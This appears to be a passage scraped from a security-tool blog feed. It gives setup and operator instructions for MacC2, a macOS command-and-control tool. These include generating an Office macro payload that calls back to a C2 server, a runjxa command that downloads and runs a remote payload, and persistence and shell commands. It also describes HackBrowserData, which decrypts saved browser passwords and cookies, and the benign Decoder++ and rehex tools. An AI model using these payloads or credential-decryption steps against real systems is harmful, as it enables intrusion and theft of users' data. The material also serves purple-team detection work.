rehex<br /></code></pre> <br /><span style="font-size: large;"><b>Building</b></span><br /> <p>If you want to compile on Linux, just check out the source and run <code>make</code>. 
You will need Jansson, wxWidgets and <a href="https://www.kitploit.com/search/label/Capstone" target="_blank" title="capstone">capstone</a> installed, along with their development packages (Install <code>build-essential</code>, <code>git</code>, <code>libwxgtk3.0-dev</code>, <code>libjansson-dev</code> and <code>libcapstone-dev</code> on Ubuntu).</p> <p>The resulting build can be installed using <code>make install</code>, which accepts all the standard environment variables.</p> <p>For Windows or Mac build instructions, see the relevant README: <a href="https://github.com/solemnwarning/rehex/blob/master/README.Windows.md" rel="nofollow" target="_blank" title="README.Windows.md">README.Windows.md</a> <a href="https://github.com/solemnwarning/rehex/blob/master/README.OSX.md" rel="nofollow" target="_blank" title="README.OSX.md">README.OSX.md</a></p> <br /><span style="font-size: large;"><b>Feedback</b></span><br /> <p>If you find any bugs or have suggestions for improvements or new features, please open an issue on Github, or join the <code>#rehex</code> IRC channel on <code>irc.freenode.net</code>.</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/solemnwarning/rehex" rel="nofollow" target="_blank" title="Download Rehex">Download Rehex</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-78238852736802056732020-11-16T17:30:00.054-03:002020-11-16T17:30:00.304-03:00MacC2 - Mac Command And Control That Uses Internal API Calls Instead Of Command Line Utilities<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-He9F4-llbFY/X7H2ikH9vQI/AAAAAAAAUXY/6yDSj3ZKujsP97ogOCw3svushxeUXOyKgCNcBGAsYHQ/s3289/MacC2_9_pic7.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="956" data-original-width="3289" height="186" 
src="https://1.bp.blogspot.com/-He9F4-llbFY/X7H2ikH9vQI/AAAAAAAAUXY/6yDSj3ZKujsP97ogOCw3svushxeUXOyKgCNcBGAsYHQ/w640-h186/MacC2_9_pic7.png" width="640" /></a></div><p><br /></p><p>MacC2 is a macOS <a href="https://www.kitploit.com/search/label/Post%20Exploitation" target="_blank" title="post exploitation">post exploitation</a> tool written in python that uses Objective C calls or python libraries as opposed to <a href="https://www.kitploit.com/search/label/Command%20Line" target="_blank" title="command line">command line</a> executions. The client is written in python2, which, though deprecated, is still shipped with base Big Sur installs. It is possible down the road that Apple will remove python2 (or python altogether) from base macOS installs, but as of Nov 2020 this is not the case. <strong>I wrote this tool to aid <a href="https://www.kitploit.com/search/label/Purple%20Team" target="_blank" title="purple team">purple team</a> exercises aimed at building detections for python-based post <a href="https://www.kitploit.com/search/label/Exploitation" target="_blank" title="exploitation">exploitation</a> frameworks on macOS</strong>. Apple plans to eventually remove scripting runtimes from base macOS installs, but it appears that python is still included by default on base installs of Big Sur.</p><span><a name='more'></a></span><p><br /></p> <p>You can set up the server locally or you can use the docker setup I have included in this repo. 
Instructions below:</p> <br /><span style="font-size: large;"><b>Instructions for Running Using Docker:</b></span><br /> <p><em><strong>If you do not already have docker set up:</strong></em></p> <ol> <li><code>chmod +x install_docker_linux.sh</code></li> <li><code>sudo ./install_docker_linux.sh</code></li> </ol> <p><em><strong>Next:</strong></em></p> <ol> <li><code>chmod +x setup.sh</code></li> <li><code>sudo ./setup.sh</code> <strong>(this will create an untrusted ssl cert and key, generate a macro file for the server and port you specify (will drop the macro in macro.txt locally), build macc2-docker, and run the MacC2 server inside of macc2-container in interactive mode)</strong></li> <li>when prompted, enter the IP/hostname of the MacC2 server<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-MAV0U_iK_10/X7H2rSM8l3I/AAAAAAAAUXc/x474QsCjtWAiMQ-mI7exVmLPwU4C0cruwCNcBGAsYHQ/s868/MacC2_1_pic30.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="90" data-original-width="868" height="66" src="https://1.bp.blogspot.com/-MAV0U_iK_10/X7H2rSM8l3I/AAAAAAAAUXc/x474QsCjtWAiMQ-mI7exVmLPwU4C0cruwCNcBGAsYHQ/w640-h66/MacC2_1_pic30.png" width="640" /></a></div><br /></li> <li>when prompted, enter the port that the MacC2 server will listen on<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-UqUZV0Ftguw/X7H2zv2ZueI/AAAAAAAAUXk/gsCfBkj-CIsXVatcxcXTYbj0A5gcYDqgQCNcBGAsYHQ/s956/MacC2_2_pic31.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="92" data-original-width="956" height="62" src="https://1.bp.blogspot.com/-UqUZV0Ftguw/X7H2zv2ZueI/AAAAAAAAUXk/gsCfBkj-CIsXVatcxcXTYbj0A5gcYDqgQCNcBGAsYHQ/w640-h62/MacC2_2_pic31.png" width="640" /></a></div><br /></li> <li>A hex encoded macro payload will be dropped locally in a file named macro.txt that is configured to connect to your MacC2 server on the hostname/IP and port 
you specified.<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-EB9AoLNq6TY/X7H25Ssu52I/AAAAAAAAUXo/0zI9wuOfaNkBYcJ123Wub7a_cCL5PxZewCNcBGAsYHQ/s2942/MacC2_3_pic32.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="246" data-original-width="2942" height="54" src="https://1.bp.blogspot.com/-EB9AoLNq6TY/X7H25Ssu52I/AAAAAAAAUXo/0zI9wuOfaNkBYcJ123Wub7a_cCL5PxZewCNcBGAsYHQ/w640-h54/MacC2_3_pic32.png" width="640" /></a></div><br /></li> <li>Docker will install the aiohttp python3 dependency, build macc2-docker, and will run the MacC2 Server in a container named macc2-container. Once finished the MacC2 server will listen on the specified port:<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-_ofTmNU5olk/X7H2-Mne8nI/AAAAAAAAUXw/K223yxss2xIJMohbFpo-GVZzmKBTCmIIwCNcBGAsYHQ/s2048/MacC2_4_pic33.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="498" data-original-width="2048" height="156" src="https://1.bp.blogspot.com/-_ofTmNU5olk/X7H2-Mne8nI/AAAAAAAAUXw/K223yxss2xIJMohbFpo-GVZzmKBTCmIIwCNcBGAsYHQ/w640-h156/MacC2_4_pic33.png" width="640" /></a></div><br /></li> <li>You can run <em>docker ps</em> and validate that the MacC2 server is running (you will see a container named macc2-container listed there)</li> </ol> <p><strong>Note: Since I am using a static container name (macc2-container), if you run this setup more than once on the same server, you will need to delete the macc2-container name after each use or else you will get an error "The container name "/macc2-container" is already in use by container". 
You can run the command below to delete the macc2-container after each run:</strong></p> <blockquote> <p>docker rm macc2-container</p> </blockquote> <p>You can then either copy the MacC2_client.py file over to the client and execute for a callback or you can import the macro.txt macro into an Office document and "Enable Macros" when opening for a callback on the client.</p> <br /><span style="font-size: large;"><b>Running Locally (Without Using Docker)</b></span><br /> <p>If you opt to not use docker, you can set up the server locally using the steps below:</p> <p>Since the MacC2 server uses the aiohttp library for communications, you will need to install aiohttp first:</p> <p><code>pip install aiohttp</code> <strong>(if you encounter an error ensure that pip is pointing to python3, since aiohttp is a python3 library)</strong>:</p> <p><code>python3 -m pip install --upgrade --force pip</code></p> <p><strong><em>On C2 Server:</em></strong></p> <ol> <li>Set up ssl (note: use a key size of at least 2048)</li> </ol> <p>If you do not have your own cert, you can use the following to generate a self signed cert:</p> <ul> <li> 1: <code>openssl req -new -newkey rsa:2048 -nodes -out ca.csr -keyout ca.key</code> </li> <li> 2: <code>openssl x509 -trustout -signkey ca.key -days 365 -req -in ca.csr -out ca.pem</code> </li> </ul> <p><strong>note: the server script is hard-coded to use ca.pem and ca.key, so keep these names the same for now, or change the code appropriately</strong></p> <ol start="2"> <li>Use macro_generator.py to create the MacC2 scripts with the server's IP/domain and port. macro_generator.py also builds a macro (macro.txt) that uses hex encoding to run MacC2. 
You can copy and paste the contents of macro.txt into an MS Office document:</li> </ol> <p>Usage:</p> <p><code>python3 macro_generator.py -s [C2 Server IP/domain] -p [C2 Server Port]</code></p> <p>Example:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-FHKiE7MZ6dQ/X7H3DQjK-gI/AAAAAAAAUX4/KVh3XWohHlgKLbMHvTg8ZaUn3dUpwoCfQCNcBGAsYHQ/s2724/MacC2_5_pic3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="404" data-original-width="2724" height="94" src="https://1.bp.blogspot.com/-FHKiE7MZ6dQ/X7H3DQjK-gI/AAAAAAAAUX4/KVh3XWohHlgKLbMHvTg8ZaUn3dUpwoCfQCNcBGAsYHQ/w640-h94/MacC2_5_pic3.png" width="640" /></a></div><p><br /></p> <ol start="3"> <li>Start the generated MacC2_server.py script to listen for a connection:</li></ol><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-FGM52djRFGQ/X7H3as61pQI/AAAAAAAAUYI/kwAbTlUAUzUrpGJenr8BKcJrKCBBBTg8wCNcBGAsYHQ/s1500/MacC2_6_pic4.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="328" data-original-width="1500" height="140" src="https://1.bp.blogspot.com/-FGM52djRFGQ/X7H3as61pQI/AAAAAAAAUYI/kwAbTlUAUzUrpGJenr8BKcJrKCBBBTg8wCNcBGAsYHQ/w640-h140/MacC2_6_pic4.png" width="640" /></a></div><p><br /></p> <p><strong><em>On <a href="https://www.kitploit.com/search/label/Client%20Side" target="_blank" title="Client Side">Client Side</a> (the target mac host):</em></strong></p> <ol> <li> If you desire to not be limited by the mac sandbox and want more functionality, you may opt to copy the MacC2_client.py script to the client (assuming you have access). 
</li> <li> On the client, run the MacC2_client.py script: <code>python MacC2_client.py</code></li></ol><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-eW1GZ8IqkRI/X7H3gch7nwI/AAAAAAAAUYM/unHnYT9exr4_eh8PpfReprYcMm8dy_WyACNcBGAsYHQ/s912/MacC2_7_pic5.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="58" data-original-width="912" height="40" src="https://1.bp.blogspot.com/-eW1GZ8IqkRI/X7H3gch7nwI/AAAAAAAAUYM/unHnYT9exr4_eh8PpfReprYcMm8dy_WyACNcBGAsYHQ/w640-h40/MacC2_7_pic5.png" width="640" /></a></div><p><br /></p> <ol start="3"> <li>On the server, you will see an inbound connection. Example below:</li></ol><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-sIhzQ1-CYhA/X7H3mkRbytI/AAAAAAAAUYQ/pwDJMo_AkA4MjzZyIt74DJ4Oid9_rFPpACNcBGAsYHQ/s1508/MacC2_8_pic6.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="326" data-original-width="1508" height="138" src="https://1.bp.blogspot.com/-sIhzQ1-CYhA/X7H3mkRbytI/AAAAAAAAUYQ/pwDJMo_AkA4MjzZyIt74DJ4Oid9_rFPpACNcBGAsYHQ/w640-h138/MacC2_8_pic6.png" width="640" /></a></div><p><br /></p><span style="font-size: large;"><b>Using MacC2</b></span><br /> <p>After you receive a connection, you can use the "help" command on the server to get a list of built-in commands available. You can enter one of these commands. After entering a command and pressing Enter, the command is queued up (allows you to enter multiple commands to be executed by the client). 
Once you type "done" and hit Enter, all of the queued commands will be sent to the client for execution.</p> <p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-JmJ4ZhiNKl4/X7H3tKIU_PI/AAAAAAAAUYY/hqhqLL1fKkE_LdCtOa25uDNQq16pKwSvwCNcBGAsYHQ/s3289/MacC2_9_pic7.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="956" data-original-width="3289" height="186" src="https://1.bp.blogspot.com/-JmJ4ZhiNKl4/X7H3tKIU_PI/AAAAAAAAUYY/hqhqLL1fKkE_LdCtOa25uDNQq16pKwSvwCNcBGAsYHQ/w640-h186/MacC2_9_pic7.png" width="640" /></a></div><p> </p> <p>Each command is pretty straightforward. The command options that are not OPSEC safe (i.e., command line executions or cause pop ups) are also flagged in red from the help menu.</p> <p>Functions of Note:</p> <ul> <li>You can generate a Mythic C2 JXA .js payload, download it, and host it on a remote server. Then you can provide the url to the hosted file to MacC2 using the <strong>runjxa</strong> command to have MacC2 download and execute the Mythic .JXA payload:</li> </ul> <p><code>>>> runjxa <url_to_JXA_.js_payload></code></p> <p><strong>Note: If you gain access using the MS Office macro, then the persistence method will not work due to sandboxing. The files will still be dropped and the login item will still be inserted but upon reboot the quarantine attribute prevents the persistence from executing</strong></p> <br /><span style="font-size: large;"><b>Additional Info</b></span><br /> <p>The MacC2 server uses aiohttp to easily allow for asynchronous web comms. 
To ensure that only MacC2 agents can access the server, the server includes the following:</p> <ul> <li> A specific user agent string check (if a request fails this check it receives a 404 Not Found) </li> <li> A specific token (if a request fails this check it receives a 404 Not Found) </li> </ul> <p>The operator flow after setting everything up and getting a callback is:</p> <ul> <li> view help menu for command options </li> <li> enter command name and press enter for each command you want to run </li> <li> enter "done" and press enter to have the queued commands sent to the client for execution </li> <li> <strong>NOTE: The default sleep is 10 seconds. The operator can change that by using the sleep [numberofseconds] command.</strong> </li> <li> NOTE: The MacC2 server currently does not have a way to conveniently switch between sessions when multiple clients connect. Instead the server auto switches between sessions after each command executed. So the operator will need to pay attention to the IP in the connection to know which session is being interacted with. </li> </ul> <br /><span style="font-size: large;"><b>Macro Limitations</b></span><br /> <p>MacC2 does NOT include any sandbox escapes, and therefore not all functions work when access is gained via the Office macro. Functions that DO work from the sandbox include:</p> <ul> <li> runjxa </li> <li> systeminfo </li> <li> persist: MacC2 can drop files to disk from a sandboxed macro payload. However, upon reboot the persistence will not execute due to the quarantine attribute on the dropped files. 
</li> <li> addresses </li> <li> prompt </li> <li> clipboard </li> <li> shell (not OPSEC safe) </li> <li> spawn (not OPSEC safe) </li> <li> cd and listdir (sandbox prevents access for most directories but you can see the root '/' directory and potentially others as well)</li></ul><div><br /></div> <p><strong><em>DISCLAIMER</em></strong></p> <p>This is for academic purposes and should not be used maliciously or without the appropriate authorizations and approvals.</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/cedowens/MacC2" rel="nofollow" target="_blank" title="Download MacC2">Download MacC2</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-44365873344312759892020-10-26T08:30:00.001-03:002020-10-26T08:30:00.128-03:00Decoder++ - An Extensible Application For Penetration Testers And Software Developers To Decode/Encode Data Into Various Formats<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-tugJ5j1-b8Y/X5ZOjWLd1AI/AAAAAAAAUKo/e2DcfbuJt4I6ycRCRVZtomCkq8SmTZZ6ACNcBGAsYHQ/s238/decoder-plus-plus_1_dpp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="208" data-original-width="238" height="349" src="https://1.bp.blogspot.com/-tugJ5j1-b8Y/X5ZOjWLd1AI/AAAAAAAAUKo/e2DcfbuJt4I6ycRCRVZtomCkq8SmTZZ6ACNcBGAsYHQ/w400-h349/decoder-plus-plus_1_dpp.png" width="400" /></a></div><p><br /></p> <p>An extensible application for penetration testers and software developers to decode/encode data into various formats.</p><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Setup</b></span><br /> <p><code>Decoder++</code> can be installed either by using <code>pip</code> or by pulling the source from this repository:</p> <div><pre><code># Install using pip<br />pip3 install decoder-plus-plus</code></pre></div> <br 
/><span style="font-size: large;"><b>Overview</b></span><br /> <p>This section provides you with an overview of the individual ways of interacting with <code>Decoder++</code>. For additional usage information check out the <code>Advanced Usage</code> section.</p> <br /><b>Graphical User Interface</b><br /> <p>If you prefer a graphical user interface to transform your data, <code>Decoder++</code> gives you two choices: a <code>main-window-mode</code> and a <code>dialog-mode</code>.</p> <p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-qpoZ0HEQhfg/X5ZOrjMNfuI/AAAAAAAAUKs/luaRO52XsVEHs3ZwjCq5tAEhqhfpXw0pQCNcBGAsYHQ/s1224/decoder-plus-plus_2_dpp-preview-001.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="835" data-original-width="1224" height="436" src="https://1.bp.blogspot.com/-qpoZ0HEQhfg/X5ZOrjMNfuI/AAAAAAAAUKs/luaRO52XsVEHs3ZwjCq5tAEhqhfpXw0pQCNcBGAsYHQ/w640-h436/decoder-plus-plus_2_dpp-preview-001.png" width="640" /></a></div><p> </p> <p>While the <code>main-window-mode</code> supports tabbing, the <code>dialog-mode</code> has the ability to return the transformed content to <code>stdout</code>, ready for further processing. 
This comes in quite handy if you want to call <code>Decoder++</code> from other tools like BurpSuite (check out the <a href="https://github.com/bytebutcher/burp-send-to" rel="nofollow" target="_blank" title="BurpSuite Send-to extension">BurpSuite Send-to extension</a>) or any other script in which you want to add a graphical user interface for flexible transformation of any input.</p> <p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-1SF2ubtN_RQ/X5ZOx6rwglI/AAAAAAAAUKw/8NhUy0q8XeMn6OfoWcLEcDiI3ZrAVx1QwCNcBGAsYHQ/s1220/decoder-plus-plus_3_dpp-preview-dialog.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="839" data-original-width="1220" height="440" src="https://1.bp.blogspot.com/-1SF2ubtN_RQ/X5ZOx6rwglI/AAAAAAAAUKw/8NhUy0q8XeMn6OfoWcLEcDiI3ZrAVx1QwCNcBGAsYHQ/w640-h440/decoder-plus-plus_3_dpp-preview-dialog.png" width="640" /></a></div><p><br /></p><b>Command Line</b><br /> <p>If you don't want to start up a graphical user interface but still want to make use of the various transformation methods of <code>Decoder++</code>, you can use the <a href="https://www.kitploit.com/search/label/Commandline" target="_blank" title="commandline">commandline</a> mode:</p> <div><pre><code>$ python3 dpp.py -e base64 -h sha1 "Hello, world!"<br />e52d74c6d046c390345ae4343406b99587f2af0d</code></pre></div> <br /><b>Features</b><br /> <ul> <li>User Interfaces: <ul> <li>Graphical User Interface</li> <li>Command Line Interface</li> </ul> </li> <li>Preinstalled <a href="https://www.kitploit.com/search/label/Scripts" target="_blank" title="Scripts">Scripts</a> and Codecs: <ul> <li><strong>Encode/Decode:</strong> Base16, Base32, Base64, Binary, Gzip, Hex, Html, JWT, HTTP64, Octal, Url, Url+, Zlib</li> <li><strong>Hashing:</strong> Adler-32, Apache-Md5, CRC32, FreeBSD-NT, Keccak224, Keccak256, Keccak384, Keccak512, LM, Md2, Md4, Md5, NT, PHPass, RipeMd160, Sha1, Sha3 224, Sha3 256, 
Sha3 384, Sha3 512, Sha224, Sha256, Sha384, Sha512, Sun Md5</li> <li><strong>Scripts:</strong> CSS-Minify, Caesar, Filter-Lines, Identify File Format, Identify Hash Format, JS-Beautifier, JS-to-XML, HTML-Beautifier, Little/Big-Endian Transform, Reformat Text, Remove Newlines, Remove Whitespaces, Search and Replace, Split and Rejoin, Unescape/Escape String</li> </ul> </li> <li>Smart-Decode</li> <li>Plugin System</li> <li>Load & Save Current Session</li> <li>Platforms: <ul> <li>Windows</li> <li>Linux</li> <li>MAC</li> </ul> </li> </ul> <br /><span style="font-size: large;"><b>Advanced Usage</b></span><br /> <p>This section provides you with additional information about how the <a href="https://www.kitploit.com/search/label/Command%20Line" target="_blank" title="command line">command line</a> interface and interactive python shell can be used.</p> <br /><b>Command Line Interface</b><br /> <p>The commandline interface gives you easy access to all available codecs.</p> <p>To list them you can use the <code>-l</code> argument. To narrow down your search the <code>-l</code> argument accepts additional parameters which are used as filter:</p> <div><pre><code>$ dpp -l base enc<br /><br />Codec   Type<br />-----   ----<br />base16  encoder<br />base32  encoder<br />base64  encoder<br /></code></pre></div> <p><code>Decoder++</code> distinguishes between encoders, decoders, hashers and scripts. Like the graphical user interface, the command line interface allows you to use multiple codecs in a row:</p> <div><pre><code>$ dpp "H4sIAAXmeVsC//NIzcnJ11Eozy/KSVEEAObG5usNAAAA" -d base64 -d gzip<br />Hello, world!</code></pre></div> <p>While encoders, decoders and hashers can be used right away, some of the scripts may require additional configuration. To show all available options of a specific script you can add the <code>help</code> parameter:</p> <pre><code>$ dpp "Hello, world!" -s split_and_rejoin help<br /><br />Split & Rejoin<br />==============<br /><br /> Name               Value   Group            Required   Description<br /> ----               -----   -----            --------   -----------<br /> split_by_chars             split_behaviour  yes        the chars used at which to split the text<br /> split_by_length    0       split_behaviour  yes        the length used at which to split the text<br /> rejoin_with_chars                           yes        the chars used to join the splitted text<br /><br /></code></pre> <p>To configure a specific script you need to supply the individual options as name-value pairs (e.g. <code>search_term="Hello"</code>):</p> <pre><code>$ dpp "Hello, world!" -s search_and_replace search_term="Hello" replace_term="Hey"<br />Hey, world!<br /></code></pre> <br /><b>Plugin Development</b><br /> <p>To add custom codecs just copy them into the <code>$HOME/.config/dpp/plugins/</code> folder.</p> <div><pre><code>from dpp.core.plugin.abstract_plugin import DecoderPlugin<br /><br /><br />class Plugin(DecoderPlugin):<br />    """<br />    Possible plugins are DecoderPlugin, EncoderPlugin, HasherPlugin or ScriptPlugin.<br />    See AbstractPlugin or its implementations for more information.<br />    """<br /><br />    def __init__(self, context):<br />        plugin_name = "URL"<br />        plugin_author = "Your Name"<br />        # Python libraries which are required to be able to execute the run method of this plugin.<br />        plugin_requirements = ["urllib"]<br />        super().__init__(plugin_name, plugin_author, plugin_requirements)<br /><br />    def run(self, text):<br />        # Load the required libraries here ...<br />        import urllib.parse<br />        # Run your action ...<br />        return urllib.parse.unquote(text)</code></pre></div> <br /><span style="font-size: large;"><b>Contribute</b></span><br /> <p>Feel free to open a new ticket for any feature request or bugs. 
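The codec chaining shown in the command line section above (`-d base64 -d gzip`, script options as `name=value` pairs) can be reproduced with nothing but the standard library. The following is an added example written for this page, not code from the Decoder++ project: it models a small registry keyed by the same flag letters the `dpp` CLI uses (`-e`, `-d`, `-h`, `-s`), applies the steps left to right, and re-decodes the README's own gzip sample. The codec and option names (`search_term`, `split_by_length`, `rejoin_with_chars`, and so on) are taken from the README text; how they are implemented here is an assumption and does not reflect dpp's real plugin classes.

```python
import base64
import gzip
import hashlib

# Registry: (kind, name) -> callable(text, options) -> text.
# kind is the dpp command-line flag letter: "e" encoder, "d" decoder,
# "h" hasher, "s" script. Names are modelled on the README, not dpp's real registry.
REGISTRY = {}


def codec(kind, name):
    """Decorator registering a transformation under a dpp-style flag and name."""
    def register(func):
        REGISTRY[(kind, name)] = func
        return func
    return register


@codec("e", "base64")
def enc_base64(text, _opts):
    return base64.b64encode(text.encode("utf-8")).decode("ascii")


@codec("d", "base64")
def dec_base64(text, _opts):
    # Decoded bytes may not be UTF-8 (e.g. a gzip stream), so carry them as latin-1
    return base64.b64decode(text.encode("ascii")).decode("latin-1")


@codec("d", "gzip")
def dec_gzip(text, _opts):
    # gzip.decompress verifies the trailer CRC32 and length, so corrupt input raises
    return gzip.decompress(text.encode("latin-1")).decode("utf-8")


@codec("h", "sha1")
def hash_sha1(text, _opts):
    return hashlib.sha1(text.encode("utf-8")).hexdigest()


@codec("s", "search_and_replace")
def script_search_and_replace(text, opts):
    # Both options are required, as in the README's search_and_replace example
    return text.replace(opts["search_term"], opts["replace_term"])


@codec("s", "split_and_rejoin")
def script_split_and_rejoin(text, opts):
    # Mirrors the help table: split either by chars or by length, then rejoin
    if opts.get("split_by_chars"):
        parts = text.split(opts["split_by_chars"])
    else:
        length = int(opts.get("split_by_length", "0"))
        if length <= 0:
            raise ValueError("split_by_length must be a positive integer")
        parts = [text[i:i + length] for i in range(0, len(text), length)]
    return opts["rejoin_with_chars"].join(parts)


def parse_argv(argv):
    """Parse dpp-like arguments: <text> (-e|-d|-h|-s NAME [key=value ...])*"""
    if not argv:
        raise ValueError("input text required")
    text, steps, i = argv[0], [], 1
    while i < len(argv):
        flag = argv[i]
        if flag not in ("-e", "-d", "-h", "-s") or i + 1 >= len(argv):
            raise ValueError("unexpected argument %r" % flag)
        kind, name, opts = flag[1], argv[i + 1], {}
        i += 2
        # Script options are bare key=value tokens that follow the script name
        while i < len(argv) and "=" in argv[i] and not argv[i].startswith("-"):
            key, _, value = argv[i].partition("=")
            opts[key] = value
            i += 1
        steps.append((kind, name, opts))
    return text, steps


def run_chain(argv):
    """Apply every step left to right, exactly like chaining -d base64 -d gzip."""
    text, steps = parse_argv(argv)
    for kind, name, opts in steps:
        if (kind, name) not in REGISTRY:
            raise ValueError("unknown codec -%s %s" % (kind, name))
        text = REGISTRY[(kind, name)](text, opts)
    return text


if __name__ == "__main__":
    # The README's own gzip sample, decoded through the same two-step chain
    print(run_chain(["H4sIAAXmeVsC//NIzcnJ11Eozy/KSVEEAObG5usNAAAA",
                     "-d", "base64", "-d", "gzip"]))
    print(run_chain(["Hello, world!", "-s", "search_and_replace",
                     "search_term=Hello", "replace_term=Hey"]))
```

Because each step receives the previous step's output as text, a decoder that yields raw bytes (base64 in front of gzip) has to carry them through unchanged, which is why the base64 decoder returns latin-1 rather than UTF-8; the gzip step then checks the stream's own CRC32 and length trailer, so a tampered or truncated sample fails loudly instead of producing garbage.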
Also don't hesitate to issue a pull request for new features/plugins.</p> <p>Thanks to</p> <ul> <li>Tim Menapace (RIPEMD160, KECCAK256)</li> <li>Robin Krumnow (ROT13)</li> </ul> <br /><span style="font-size: large;"><b>Troubleshooting</b></span><br /> <br /><b>Signals are not working on Mac OS</b><br /> <p>When starting <code>Decoder++</code> on Mac OS, signals are not working.</p> <p>This might happen when <code>PyQt5</code> is installed using homebrew. To fix this issue it is recommended to install the <code>libdbus-1</code> library. See <a href="http://doc.qt.io/qt-5/osx-issues.html#d-bus-and-macos" rel="nofollow" target="_blank" title="http://doc.qt.io/qt-5/osx-issues.html#d-bus-and-macos">http://doc.qt.io/qt-5/osx-issues.html#d-bus-and-macos</a> for more information regarding this issue.</p> <br /><b>Cannot start Decoder++ in <a href="https://www.kitploit.com/search/label/Windows" target="_blank" title="Windows">Windows</a> using CygWin</b><br /> <p>When starting <code>Decoder++</code> in <code>CygWin</code> an error occurs:</p> <pre><code> ModuleNotFoundError: No module named 'PyQt5'<br /></code></pre> <p>This happens although <code>PyQt5</code> is installed using pip. Currently there is no fix for that. 
Instead it is recommended to start <code>Decoder++</code> using the Windows command line.</p> <br /><span style="font-size: large;"><b>Inspired By</b></span><br /> <ul> <li>PortSwigger's Burp Decoder</li> </ul> <br /><span style="font-size: large;"><b>Powered By</b></span><br /> <ul> <li>PyQt5</li> <li>QtAwesome</li> </ul> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/bytebutcher/decoder-plus-plus" rel="nofollow" target="_blank" title="Download Decoder-Plus-Plus">Download Decoder-Plus-Plus</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-73951456097936981892020-10-16T08:30:00.014-03:002020-10-16T08:30:07.595-03:00HackBrowserData - Decrypt Passwords/Cookies/History/Bookmarks From The Browser<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-DDvJRMpvhKU/X4UxwUWiH4I/AAAAAAAAUB4/wxSbas_tJCMG-Mq2oSLEO3_TZJwvjXdzQCNcBGAsYHQ/s853/HackBrowserData.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="448" data-original-width="853" height="336" src="https://1.bp.blogspot.com/-DDvJRMpvhKU/X4UxwUWiH4I/AAAAAAAAUB4/wxSbas_tJCMG-Mq2oSLEO3_TZJwvjXdzQCNcBGAsYHQ/w640-h336/HackBrowserData.png" width="640" /></a></div><p><br /></p><p></p> <p>hack-browser-data is an open-source tool that could help you decrypt data (passwords / bookmarks / cookies / history) from the browser. 
It supports the most popular <a href="https://www.kitploit.com/search/label/Browsers" target="_blank" title="browsers">browsers</a> on the market and runs on Windows, macOS and Linux.</p><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Supported Browser</b></span><br /> <br /><b>Windows</b><br /> <table> <tbody><tr> <th align="left">Browser</th> <th align="center">Password</th> <th align="center">Cookie</th> <th align="center">Bookmark</th> <th align="center">History</th> </tr> <tr> <td align="left">Google Chrome</td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> </tr> <tr> <td align="left">Firefox</td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> </tr> <tr> <td align="left">Microsoft Edge</td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> </tr> <tr> <td align="left">360 Speed Browser</td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> </tr> <tr> <td align="left">QQ Browser</td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> <td align="center"><div>yes</div></td> </tr> <tr> <td align="left">Internet Explorer</td> <td align="center"><div>no</div></td> <td align="center"><div>no</div></td> <td align="center"><div>no</div></td> <td align="center"><div>no</div></td> </tr> </tbody></table> <br /><b>MacOS</b><br /> <p>Based on Apple's security policy, some browsers <strong>require a current user password</strong> to decrypt.</p> <table> <tbody><tr> <th align="left">Browser</th> <th align="center">Password</th> <th 
